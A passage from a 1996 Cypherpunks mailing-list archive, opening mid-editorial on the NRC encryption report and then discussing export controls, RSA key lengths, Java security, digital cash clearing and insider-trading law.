secretary of state in the Reagan administration, and included a
distinguished group of former top law enforcement and Pentagon officials --
took a more nuanced approach.  The spread of encryption, the panel agreed,
will make it harder for spies and cops to listen in on enemies and signals.

	But the greater terrorist and criminal threat, it concluded, arises from
electronic networks vulnerable to tampering.  The law enforcement benefit
from the wider use of encryption to keep a terrorist hacker from shutting
down the air traffic control system or an electronic criminal from looting
bank transactions will outweigh the diminished utility of wiretapping.

	Thus, the panel recommends that national policy promote the use of
encryption to protect vital communications systems, such as voice and
cellular telephone systems, from intrusion by criminals.  To give businesses
and individuals confidence in encryption, standards and technology should be
driven by the market and by users, not by the government.  And because
current restrictions on the export of encryption software leave U.S. firms
abroad vulnerable and inhibit the use of the best encryption in U.S.
products, it also recommends relaxation of those controls.

	The burgeoning Internet and expanding wireless communications will be
essential to the economy's growth over the next generation.  But those
technologies can never achieve their full potential if commercial
transactions and personal communications are vulnerable to interception.
The NRC report makes plain that encryption is less of a problem than a
solution.  Its recommendations provide Congress with a guide to policy at a
time that the Clinton administration is paralyzed, its finger in the dike,
protecting against a technological flood that it cannot hope to control.

Copyright, 1996, The Sacramento Bee

--------------------------------
Glenn C. Jones

"If you're walkin' on thin ice, 
you might as well dance."
--------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 4 Jun 1996 18:55:41 +0800
To: cypherpunks@toad.com
Subject: Re: CWD: "Jacking in from the "One that Got Away" Port
Message-ID: <199606040610.XAA02467@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:19 PM 6/3/96 -0500, Declan McCullagh wrote:
>(By Brock Meeks / brock@well.com / Archived at http://www.cyberwerks.com/)
>
>
> CyberWire Dispatch // Copyright (c) 1996 //

> A virtual tactical nuke was hurled into the arcane subculture of
> encryption technology Monday when RSA President Jim Bizdos revealed
> that his company's Japanese subsidiary had developed a monster chipset
> capable of scrambling voice and data real time with a so-called "key
> length" of up to 1024 bits.

I don't mean to be overly critical, but why not provide for the possibility 
of longer keys?  The RSA key only has to be exchanged and decoded once per 
call, presumably, which suggests that there shouldn't be a problem to do 
2048-bit keys.  Admittedly, 1024 bits will be good for many years, but...

> That key length stuff is just so much gibberish to those playing
> without a scorecard, so let me drill down on it for you.  Basically,
> the longer the key length, the harder it is for a message to be broken
> by "brute force" automated attacks.  Current U.S. laws prohibit the
> export of any encryption device with a key length longer than 40-bits,
> or roughly the equivalent of  Captain Crunch decoder ring. For hardcore
> math types, I'm told that a 1024-bit key length is 10 to the 296th
> power more difficult to break than 40 bits.

I sure do wish they'd get things like this a bit more accurate...  Oh, well, 
I suppose it doesn't really matter...


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 4 Jun 1996 15:52:32 +0800
To: cypherpunks@toad.com
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad???
In-Reply-To: <Pine.SUN.3.91.960603144035.8479A-100000@polaris>
Message-ID: <mmaZoD50w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:
> I direct you to Dirks v. Securities and Exchange Commission, 463 U.S. 646
> (1983).

rev'g 681 F.2d 824 (D.C.Cir.1982), SEC. Rel #34-17480 (Jan 22, 1981).

> Specifically footnote 14:
>
> "Under certain circumstances, such as where corporate information is
> revealed legitimately to an underwriter, accountant, lawyer, or
> consultant working for the corporation, these outsiders may become
> fiduciaries of the shareholders....  When such a person breaches his
> fiduciary relationship, he may be treated more properly as a tipper than
> a tipee...."
>
> This circumstance is classically refered to as a "footnote 14 insider."
>
> It has been held to apply to lower level employees within the corporation
> who "knowingly trade based on material non-public information acquired by
> virtue of their position within the company."

The poor Dirks was a financial analyst who "received information from a
former vice president of Equity Funding that there was widespread fraud at
the company. Dirks confirmed this information with one current and several
former Equity Funding employees and communicated it to five investment
advisors. The five investment advisors sold or directed the sale of large
blocks of Equity Funding stock without disclosure of the information they
had received from Dirks. The SEC found that once Dirks had confirmed the
information by contact with a number of former insiders, it had a
reasonable probability of being true and was, for that reason, material
nonpublic information. The SEC also held that Dirks aided and abetted
violations of Section 10(b) on the part of the investment advisors who were
his tippees. The decision was upheld by the Court of Appeals but _reversed
by the Supreme Court on the grounds that the insider did not breach his
fiduciary duty by disclosure of the information because there was no benefit
to the insider, and thus Dirks did not breach any duty." I.e., Dirks got
away with it, after spending lots of $$$ on shysters.

IANAL, but I see a trend to let insiders get away with trading on material
non-public information in Chiarella v. U.S. (455 US 222 (1980)) followed by
Dirks.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alc <alc@trillion.demon.co.uk>
Date: Tue, 4 Jun 1996 14:22:47 +0800
To: cynthia@usenix.org
Subject: Audit & Security reviews
Message-ID: <1578@trillion.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


UNIX  and  DEC VMS Security Reviews

I would like to take this opportunity to tell you about two of our audit 
software tools, PCUA and PCDA.

PCUA and PCDA are PC based software tools designed to review the security of 
Unix or DEC computers using only the stand-alone PC in your office. There is no 
need for connections to the system, user-IDs or even a knowledge of computer 
security.  Simply obtain a copy (usually on a floppy disk) of key files from 
the system under review, load these onto your PC and let our tools do all the work.

These packages are ideal for use by auditors, security officers and computer 
system managers - anyone who takes computer security seriously.  The programs 
produce a wide variety of reports which show the findings, explain the 
implications of the problems and then make recommendations about how to improve 
security.  Reports range from a full, detailed report which is user-definable 
to a brief list of the problems found.

Both packages are evolving products and we continue to add new tests to them, 
as well as keeping up to date with the latest releases of the operating systems.  
If you would like further tests added, we would be pleased to include these in 
our next release.

To obtain more information or  demonstration disks then please contact us.

Thank you for taking the time to look through this email.


Alastair Coxall
Technical Director

TRILLION SOFTWARE Ltd
The Firs,  Broadwalk,  Cranleigh,  Surrey GU6 7LS,  England

Tel: +44 1483 274001   
Fax: +44 1483 274017   

Email: alc@trillion.demon.co.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 4 Jun 1996 17:47:31 +0800
To: cypherpunks@toad.com
Subject: Re: Java
Message-ID: <199606040626.XAA09729@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:22 PM 6/3/96 -0400, Perry E. Metzger wrote:
>I've been rather hard on Java here lately.

I'll say.  You have also ignored some of Java's other features.  Machine
independence is probably the most important.  A nice, small, easy to learn
language is another.

[As an aside, when I attempted to compile Wai Dei's crypto lib 2.0 with the
Symantec Project Manager C++ compilers, none of the 3 would compile it. 
The one which generated the fewest errors had "internal error" on two
modules.  This problem occurs because C++ is such a large language, with a
number of obscure features which compiler writers don't always handle.  In
addition, C++ is in no way machine independent.  The simplest example is
that sizeof(int) is machine dependent.]
>
>...
>
>Sun is, unfortunately, suffering from a substantial hubris problem. As
>I have noted, the original Java applet security model and all the
>followups have had exactly the same problem -- they depend on perfect
>implementation of every element of the security model for the security
>to work, instead of having the realistic and conservative assumption
>that portions of the model will be misimplemented, and designing for
>defense in depth.

If you want defense in depth, run your Java interpreter in an OS
environment which limits the interpreter's access to only those resources
you wish it to access.

I get the impression that the environment you are concerned with is a bunch
of PCs running W95 or NT.  These OSs are fragile enough, particularly to
the denial of service attacks your users can not tolerate, that the only
way to approach safety is to only run software which has been approved by
an in-house testing authority.  Even with the in-house testing authority,
you really need a better OS to protect against testing failures.


>Beyond that, however, they have created the ultimate hype
>monster. Java is a neat idea looking for a good application. I use the
>web all day long and I have yet to see a good use for Java.

There have been discussions of crypto applications in Java.  Doing the
crypto on the user's system before sending data thru the net is a useful
application.  While, as a number of us have pointed out, there are problems
doing crypto with Java, it may be the easiest way to deliver strong crypto
quickly to Joe Websurfer.

In the long run, I hope to use Java to sell cycles.  Java has the advantage
in a cycle market that it is machine independent, and the Just In Time
compilers should make the performance reasonable.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 4 Jun 1996 16:34:09 +0800
To: qut@netcom.com
Subject: Re: your mail
In-Reply-To: <199606040046.RAA17821@netcom6.netcom.com>
Message-ID: <Pine.SUN.3.91.960603233917.7894A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 3 Jun 1996 qut@netcom.com wrote:

> ncr terminals are the most 31173 D0Dz


I think you mean 31337.

(eiite doesn't make much sense)

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 4 Jun 1996 16:11:46 +0800
To: cypherpunks@toad.com
Subject: e$: Interbank Digital Cash Clearing, Better Living through
Message-ID: <v03006f01add9604894a2@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Mon, 3 Jun 1996 21:03:16 -0400
To: Multiple Recipients of e$pam <e$pam@intertrader.com>
From: e$pam@intertrader.com (e$pam)
Reply-To: e$@thumper.vmeng.com
X-Comment: To unsubscribe, send an email to e$pam-request@intertrader.com
X-Comment: containing the command "unsubscribe e$pam"
Precedence: Bulk
Subject: e$: Interbank Digital Cash Clearing, Better Living through
X-orig-from: Robert Hettinga <rah@shipwright.com>

X-e$pam-source: owner-ecash@digicash.com

Forwarded by Robert Hettinga

-----------------------------------------------------------------------
X-Sender: rah@tiac.net
 Mime-Version: 1.0
 Date: Mon, 3 Jun 1996 17:34:31 -0400
 To: ecash@digicash.com
 From: Robert Hettinga <rah@shipwright.com>
 Subject: e$: Interbank Digital Cash Clearing, Better Living through
  Walletware, Microintermediation, Net.Currencies and ECM
 Sender: owner-ecash@digicash.com
 Precedence: bulk


-----BEGIN PGP SIGNED MESSAGE-----

 e$: Interbank Digital Cash Clearing, Better Living through Walletware,
 Microintermediation, Net.Currencies and ECM

 June 3, 1996
 Boston,Massachusetts


 People have asked me what I think about interbank digital cash clearing, and
 I say I'm all for it. Flippant comments aside, I'm not sure I can add
 anything to the discussion, but I'll take a shot at it.

 It's easy to argue that there's no real need right now for *on-net*
 interbank clearing, especially with online cash. If you handle the
 transactions right, the merchant just verifies and deposits cash as it comes
 in. This works especially well with the underwriter-as-internet-ATM-machine
 model I like to use in discussion. (I include that here only by reference,
 as I've beat it to death. The e$ home-page is http://thumper.vmeng.com/rah/
 ) If the trustee behind the underwriter is, well, trusted, to do deposits as
 well as withdrawls, then the "problem" of interbank clearing on the net
 itself goes away. Actually, we just translate it into "normal" world of
 book-entry banking transactions, and the trustee does the interbank clearing
 there. Same as it ever was.

 In this scenario, if the customer presents a certificate requiring change,
 the change can be issued in the same transaction as the deposit of the rest
 of the transaction's proceeds. Frankly, in a world of ubiquitous networks,
 this is clearly the way to go for merchants of any means whatsoever, because
 it's completely safe for them, and it doesn't matter who the underwriter of
 the cash is. With the proper level of software abstraction, it may not even
 matter what the cash protocol is.

 However, networks are a long way from ubiquitous, and that means offline
 transactions for a lot of cases. Fortunately, if we want to think about
 offline transactions, we can pilfer some more ideas from, as usual, the
 market for traveller's checks. When a merchant deposits a traveller's check,
 her bank clears it like any other check. That's possible because not only is
 the check secured, but it is hard to replicate. Most importantly, American
 Express offers a virtual guarantee of payment even if the checks are proven
 to be lost or forged, which speaks volumes about the susceptability of the
 system to any large-scale fraud.  However, in the unlikely event that AmEx
 goes out of business, the merchant, not the bank, would be left holding the
 bag, just like she would be with a bounced check. Obviously, the same thing
 happens with money orders, a market in which there are many more issuers.
 All banks issue money orders, but traveller's checks require large consumer
 marketing campaigns, so there are fewer underwriters of them.

 So, if it is possible to build linkages between digital cash and the
 checking system through the merchant's bank, we might have another solution.
 Fortunately, this is no problem. A merchant takes in various forms of
 off-line cash all day and deposits it electronically at the time she
 deposits her other money.  The bank validates, clears, and deposits the cash
 right there at the teller/ATM, through it's connections to the net. This is
 (barely!) analogous to what happens to a traveller's check or money order,
 which is deposited and sometimes physically flown to the issuer's bank to
 clear, and paid back to the depositor by fed wire to settle the transaction.
 Making change for the transactions themselves in this scenario is
 problematic, but the merchant can just hand back physical cash, just like
 she does with traveller's checks.

 An all-electronic variant on this "mixed-money" change method is for the
 merchant to hand back whatever digital-note change she has, regardless of
 who issued, and this implies a lot of preconditions, but it's not as scary
 as it looks, which we'll see in a little bit.


 Right now, when we talk about the need for interbank clearing, a lot of
 people seem to be talking about offline cash. As we saw, online clearing is
 pretty much a geodesic process, because you're connected straight to the
 underwriter of the cash you're using for the transaction under way. It's
 hard for me to see any need for on-net intermediaries for online cash, at
 least for the time being, because the trustee, the actual financial
 intermediary in the transaction, is hooked into the "physical" financial
 system of banks, ATM networks, and central-bank fund-wires. I'll talk about
 on-the-net financial intermediaries a bit later, though, and there might be
 one wild card, but I'm not sure.

 In the same way that I claim that certificate-based clearing and settlement
 is always going to be cheaper than book-entry methods, I think that offline
 cash is always going to be cheaper at the margin than online cash. The risk
 of offine transactions is always going to be double-spending, and that has
 to be traded against convenience, lower cost of not needing net access and
 the absolute anonymity you can get by not having to ever reveal yourself to
 even the underwriter of the digital cash in question. My claim of
 "marginally cheaper" for offline cash is strictly because of the lack of a
 net connection, but this cost-component will continue to fall into the
 forseeable future, so it will be less of an issue. Today, however, with only
 tens of millions of people on the net out of a world population in the
 billions, off-line digital cash has a significant cost advantage, and as
 long there's a bank with in a few transactions' proximity to the offline
 transaction in question, I think it can still be pretty safe to do offline
 digital cash transactions.  Precicely because we're only a transaction-hop
 or two from an on-line transaction, double spending is reduced to a physical
 phenomena at the smartcard-to-smartcard level, which is much easier to deal
 with. The hoary old bugbear people like trot out at times like this, that of
 a bajillion salami-slice transactions done simultaneously all over the net
 all at once, goes back under the bed -- or back into the monster closet --
 where it belongs. (Speaking of bugbears, remember, the problem of someone
 stealing a bank's key, and literally printing free money, is more a problem
 of issuing digital cash batches with expiry dates than anything else.  More
 to the point, the problem belongs to a single underwriter, and not to a
 robust market with many competing underwriters.)

 Anyway, the upshot of the double-spending problem is that it assumes a world
 of strictly offline transactions, which is almost as ludicrous as a world of
 strictly online transactions. ;-). Any robust and marketable system of
 digital cash will need to be able to do both.

 Like I said above, the transaction handling mechanisms are everything in a
 multi-underwriter, multi-trustee, and even multi-certificate-protocol
 regime. We need to have a set of standards for digital cash clearing and
 settlement which makes the actual issuer as transparent as possible to the
 transaction's participants. After all, that's what we have with checks. The
 bank the check's drawn on doesn't really matter. To a lesser extent, neither
 does the issuer of a traveller's check or money order. Who printed the check
 *certainly* doesn't matter.

 That's about where we want to be with digital cash. If I want to buy
 something from you with ecash, the last thing we should care about is the
 mechanics of the transaction, and *that* includes who the issuer of the cash
 is, who the trustee is who's going to do the interbank settlement out in the
 book-entry world, who the protocol designer is who invented the type of cash
 we're using, who the software developers were who developed my wallet and
 your register. None of that. We just want to settle the trade.  Better
 living through walletware.

 That means that we need think about multi-underwriter clearing from the
 outset, preferrably at the merchant level, and I'm sure that's what Digicash
 is moving towards.  Digicash's walletware and registerware, or anyone else's
 for that matter, should be able to transact business with ecash of any form,
 without discrimination. If I spend some ecash with you, your cash register
 should take any and all combinations of my Deutche-ecash, or my Twain-ecash,
 or my Finn-ecash, validate them online with their underwriters (whose
 responsibility for transaction clearing turnaround should make speed a major
 selling point to their customers), and hand me back change however I want
 it, choice of underwriter (or not) and all. In fact, if everything works
 out, and markets for digital cash underwriting become efficient and
 competitive, then *who* underwrites my ecash becomes less of an issue to me
 over time. One form of ecash is as good as another, because it all
 interoperates. So, if we assume that walletware takes different protocols,
 it seems that the dominant digital cash protocol would be that which
 operates best from the *underwriter's* standpoint, which is where it should
 be, since they're the ones whose reputations are being risked, "rented", as
 it were.


 Okay. Let's look quite a few years ahead, to a time when most money that
 comes onto the net stays here and just gets moved around, to digital bearer
 bonds, or to digital mutual fund certificates, or whatever. Let's say that
 Tatsuo Tanaka's scenario has come to pass. That is, because the money's not
 leaving the net as soon as the transaction takes place, like we've been
 talking about, the digital cash underwriters and trustees, most likely with
 the knowing collusion of users who want to pay lower purchase discounts,
 start "creating" money by issuing cash against fractional, instead of 100%
 reserves. More to the point, to follow Tanaka some more, a panic or two
 brought about by these shenanigans has caused the underwriters to police
 themselves by creating some kind of independent currency control for various
 associations of fractional-reserve underwriters, much in the same way that
 fractional reserve bank panics were handled prior to the advent of central
 banking. We may even have several full-blown internet currencies, controlled
 by currency boards of some kind. I'm not talking about nation-states, here,
 either. All of this could be done on a private basis. Real live private
 currencies, offered by an association of digital cash underwriters.

 This is a *long* way off, but do you see what I'm getting at here? What we
 end up with is an on-the-net interbank clearing system, doing just what the
 book entry system does now, only without governments or central banks in the
 middle. We have intermediaries in the form of a board which manages the
 quantity of a given private currency based on "foriegn" reserves, that is,
 the holdings in its member banks in the *other* currencies, which prevents
 monitary inflation, and that's one place where the "interbank" clearing
 takes place. In this environment, we also have currency hedgers and
 speculators, who make (or save) money by trying to figure out where
 currencies of various kinds are going to go relative to one another.  These
 days we have institutions moving large amounts of currencies around, doing
 insecure trades on secure networks. However, the technology of digital
 bearer certificates and ubiquitous public networks could enable a legion of
 very small autonomous entities to do the same kinds of activity that the big
 boys do now. So we don't get "disintermediation", which lots of people see
 right now with the merger of your local savings bank into a big
 conglomerate, or your local stockbroker getting bought or put out of
 business by a discount broker or mutual fund. We end up with
 "microintermediation".

 Actually, I've written about the same idea elsewhere, of underwriting "bots"
 providing ubiquitous auction markets for things like personal digital bearer
 bonds, etc., but in this case we have a bunch of trading 'bots making
 secondary markets in currency, hedging and speculating on price fluctuations
 for money, all like a bunch of microscopic George Soroses. Like George Soros
 and his famous takedown of the EU's exchange mechanism, these bots would be
 who actually "determine" the price of a given net.currency versus another,
 and not the net.currency boards at all.


 Okay. I've wandered way out here on a limb, and I'm going to climb off of it
 soon, before I either fall or someone cuts it off. :-). However, before I
 go, let's look at something which actually happened, and which may be a
 pointer to what could happen again soon, without too much trouble. I'm
 talking about ecm, or the electronic cash market trading list.

 Last summer, when I got back from my New Orleans trip, I was up in Montana
 hanging out while my wife was at an educator's conference, and Lucky Green
 sends me e-mail about having just sold, for cash, some of the demo
 "cyberbuck" certificates that Digicash was issuing at the time. I commented
 about this to cypherpunks, one thing led to another, and the next thing I
 knew, Rich Lethin had started up a mailing list and set up a protocol for
 trading these beta-certificates for cash over that list. He named the list
 ecm. (Send "info ecm" in the body of a message to majordomo@ai.mit.edu, if
 you want to see what the fuss was all about.) It was used sporadically up to
 the time when, you guessed it, Mark Twain came on line with *actual* digital
 cash, and people stopped trading beta-certificates altogether. I can't even
 remember what the last settlement price was, but it was pennies on the
 dollar. Actually, now that I remember  it, there was a period where the
 beta-certificates were traded for real Mark Twain ecash on someone's
 web-page and then announced on ecm, but things have pretty much gone
 moribund on ecm lately. I haven't seen a trade go across in many months.

 ECM is the "wild-card" exception to using the current banking system for
 interbank digital cash clearing. The one that I was talking about above,
 after I said we didn't really need an interbank clearing mechanism on the
 net itself.  If someone wanted "clear" these different versions of ecash on
 the net some day, they could just take positions in both the Finnish, Mark
 Twain, and eventually Deutchebank certificates, and run a little currency
 exchange operation for fun, and maybe profit, between the three by
 announcing their bid/ask prices on ecm in both certificates. Hint: buy low,
 sell high. :-). They could even do currency-speculation-by-proxy by taking
 different positions in these certificates if they wanted to. It may even be
 that someone could do this and make a living at it, someday, if enough
 digital cash was used on the net, particularly if they could do it cheaper
 than it would cost someone to "deposit" their cash, through an underwriter,
 into their own bank account.

 Would income or capital gains taxes be considered part of that deposit
 "cost"?  As Francis Urquart (RIP) used to say, "*You* might say that, but
 *I* couldn't possibly comment."


 Cheers,
 Bob Hettinga








 -----BEGIN PGP SIGNATURE-----
 Version: 2.6.2

 iQCVAwUBMbNaLPgyLN8bw6ZVAQHf6QP/aDY1bhj+ZaG/yTGqezDpnuYYn2Gp2lVE
 QTTb8z5e9CLWDRMfLCEsFYs8OoXaWNa6NWmDTnpM44NuDawzfqmywWV4RIUyTp1B
 /ArcruU7z1LiCJUFI8XByGwQiGKsqVRVaoybf2QXP2NGeNSYuYol8s6umcmznzbR
 cXqvCdBMW/s=
 =YW/2
 -----END PGP SIGNATURE-----

 -----------------
 Robert Hettinga (rah@shipwright.com)
 e$, 44 Farquhar Street, Boston, MA 02131 USA
 "If they could 'just pass a few more laws',
   we would all be criminals."    --Vinnie Moscaritolo
 The e$ Home Page: http://www.vmeng.com/rah/



--------------------------------------------------
The e$ lists are brought to you by:

Take Your Business Online with Intertrader Ltd, Edinburgh, U.K.
Visit http://www.intertrader.com or email info@intertrader.com

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
for details...
-------------------------------------------------

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 4 Jun 1996 18:03:15 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Java Crypto API questions
Message-ID: <v02120d15add98b67e218@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:22 6/3/96, jim bell wrote:

>A signature is just that:  A signature.  It doesn't encrypt or decrypt.  It
>doesn't even ALLOW the system it's in to encrypt or decrypt, because there
>are numerous encryption programs written that have no need for such a
>signature.  If no program existed which _used_ that signature, nobody would
>think twice about exporting it.
>
>The fact is, it is LEGAL to import encryption code into the US.  It is LEGAL
>to generate an hash of that code, and it is LEGAL to export that hash.  To
>believe otherwise is to broadly expand the scope of export laws far beyond
>what they were intended to mean.

First, the ITAR are not laws, but regulations. Second, there are many that
believe that applying ITAR to crypto software is already expanding the
scope of the regulations far beyond what they were intended to mean.

Let us not forget that the ITAR were written to prevent the proliferation
of military technology. Applying them to mass market crypto software does
not aid this original goal in any way. At one point, the existing ITAR
began to be used to further a cause utterly unrelated to their original
intend: limiting the domestic market penetration of strong crypto systems.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 4 Jun 1996 15:33:22 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Anonymous stock TRADING (was Saw this on CNN: )
In-Reply-To: <199606040240.VAA31145@manifold.algebra.com>
Message-ID: <199606040353.XAA06812@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home writes:
> Which brings up another ignorant question: suppose that I am a 
> corporate officer who does receive substantial "insider" information,
> for example results of audits, before they become public. What would
> prevent such an insider from creating a phony offshore trading company,
> and sending orders to that company using cypherpunks technology? 

Very little. However, there would be a noticable shift in the price of
the stock prior to the public information arriving. This would trigger
an investigation. There would be a very limited number of people able
to get at the inside information, so the pool of suspects would be
small (usually on the order of a dozen people or less), and if you,
say, wanted to spend your money, you might end up being caught.

In other words, anonymity works better when the "crime" isn't visible
to anyone watching the stock market and could be committed by more
than a handful of people.

Personally, I don't object to insider trading, but it can be hard to
get away with depending on circumstances.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 4 Jun 1996 15:25:19 +0800
To: cypherpunks@toad.com
Subject: Re: Idea 'bout banning the internet
Message-ID: <199606040432.AAA20740@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Jun 96 at 16:16, Blake Wehlage wrote:

> What if in the future a country banned the internet and all things that had
> to deal with it (ie-  telnet, irc). It would be  the "underground" thing.

Depends. If it were run by people like the Khmer Rouge than anybody 
who so much as knows how to use a pocket calculator is better off 
leaving the country.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 4 Jun 1996 15:22:56 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Saw this on CNN: Anonymous Stock tips over IRC as bad??
Message-ID: <199606040435.AAA20775@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Jun 96 at 15:18, Jeff Barber wrote:

> I trust it won't stun you to find that many, many large and even small
> corporations -- including my current employer [*NOT* SecureWare, BTW,
> despite the email address] -- actually encourage their employees to buy
> stock by offering stock purchase plans as a benefit of employment.  They
> even make it convenient by deducting purchases from one's paycheck.
[..]

There's a difference between a) buying stock in your employer's 
company generally [above example] and b) buying stock in your 
employer's company because your department is working on something 
that will raise the stock value etc. etc.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 4 Jun 1996 16:07:03 +0800
To: jeremey@forequest.com (Jeremey Barrett)
Subject: Re: Fate of Ecash if RSA is cracked?
In-Reply-To: <Pine.BSI.3.91.960603161453.20486C-100000@descartes.forequest.com>
Message-ID: <199606040508.AAA01035@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Jeremey Barrett wrote:
> > The "Idea Futures" forum has established odds on this. The current odds are
> > currently 60% that a 1024 bit number will be factored by 2010 and 30% that
> > a 512 bit number will be factored by 1997.
> > 
> 
> True, but by that time I'll be able to use 2048 or bigger keys with the same
> or better performance as 1024 bit keys now.  As long as factoring is
> exponential, you can always make it impossible to factor your keys. 
> And I think it will always be exponential.

Actually factoring is not exponential even now. For Number Fiels Sieve 
method the number of operations is estimated as

N ~= exp(((1.923+O(1)) * (ln n)^(1/3) * ln ln n)^(2/3))

(taken from Schneier, A.C., page 256)

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 4 Jun 1996 16:40:18 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous stock TRADING (was Saw this on CNN: )
In-Reply-To: <199606040240.VAA31145@manifold.algebra.com>
Message-ID: <N6FZoD56w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> Which brings up another ignorant question: suppose that I am a
> corporate officer who does receive substantial "insider" information,
> for example results of audits, before they become public. What would
> prevent such an insider from creating a phony offshore trading company,
> and sending orders to that company using cypherpunks technology?

If he doesn't report the income from the trades, the IRS may nail him.
If he does, then they'll look at what trades he did.

Interestingly, all this trading on inside information didn't use to be
a crime in the U.S. at one time, and is not a crime in most of the world.
Most non-Americans view access to material nonpublic information as one
of the job perks, just like the ability to sexually harrass one's secretary.

Interested cpunks should check out the book _International Investments_
by Bruno Solnik (0-201-56707-5). It doesn't talk about insider trading,
but it has some fascinating comparisons of market practices in different
countries, and some thoughts on the value of anonymity vs. reputation.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Tue, 4 Jun 1996 16:08:26 +0800
To: assassin@gladstone.uoregon.edu
Subject: Re: Arms Trafficker Page Made CNN!
In-Reply-To: <01I5H4HBQ11I8WW2JK@OREGON.UOREGON.EDU>
Message-ID: <Pine.LNX.3.91.960604010944.2299E-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 3 Jun 1996 assassin@gladstone.uoregon.edu wrote:

> Do you have the cnn story on .../arms-trafficker/?
> Just what mention of it was made?

They played it again, so I got it on video tape.  They
were talking about the encryption export issue and then 
showed my page and said:

CNN
>But privacy advocates are complaining loudly on the Internet.
>This web site calls for civil disobedience by encouraging
>people to send this encryption program overseas illegally.


The arms trafficker page was shown on CNN computer connection  
about 3:05 pm Saturday June 1, 1996, and again at 4:05 am June 2.
 
At some point a full transcript of the show should be on:

http://www.cnn.com/TRANSCRIPTS/conn/

http://www.cnn.com/CNN/Programs/CompConn/



  -- Vince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TT <apache@quux.apana.org.au>
Date: Tue, 4 Jun 1996 05:18:59 +0800
